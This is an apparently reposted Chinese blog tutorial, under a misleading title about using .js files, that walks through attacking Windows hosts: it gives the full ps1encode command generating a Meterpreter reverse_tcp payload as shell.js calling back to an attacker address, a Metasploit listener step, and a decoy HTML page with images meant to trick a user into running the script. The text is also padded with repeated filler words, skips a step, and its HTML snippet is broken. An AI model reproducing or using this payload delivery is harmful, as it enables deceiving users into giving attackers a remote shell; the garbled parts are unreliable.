.js文件怎么用(.js文件怎么使用)

利用工具

项目地址:https://github.com/CroweCybersecurity/ps1encode

适用场景:目标主机Windows系列

攻击流程

1、下载ps1encode:

.js文件怎么用(.js文件怎么使用)

2、生成载荷

./ps1encode.rb --LHOST 192.168.67.128 --LPORT 4444 --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js >> shell.js

.js文件怎么用(.js文件怎么使用)

3、使用Msf进行本地监听

.js文件怎么用(.js文件怎么使用)

4、创建隐蔽的html文件以及图片文件进行迷惑用户,在html文件中引用恶意的JS文件:

.js文件怎么用(.js文件怎么使用)

<html><title>SimpleTest</title><body><p style=\\\"display:none\\\" data-type=\\\"png\\\" data-w=\\\"980\\\" style=\\\"\\\">

6、之后成功反弹shell回来

凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字

原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34126.html

(0)
七芒星实验室's avatar七芒星实验室
上一篇 2024年4月13日 上午9:26
下一篇 2024年4月13日 上午9:28

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注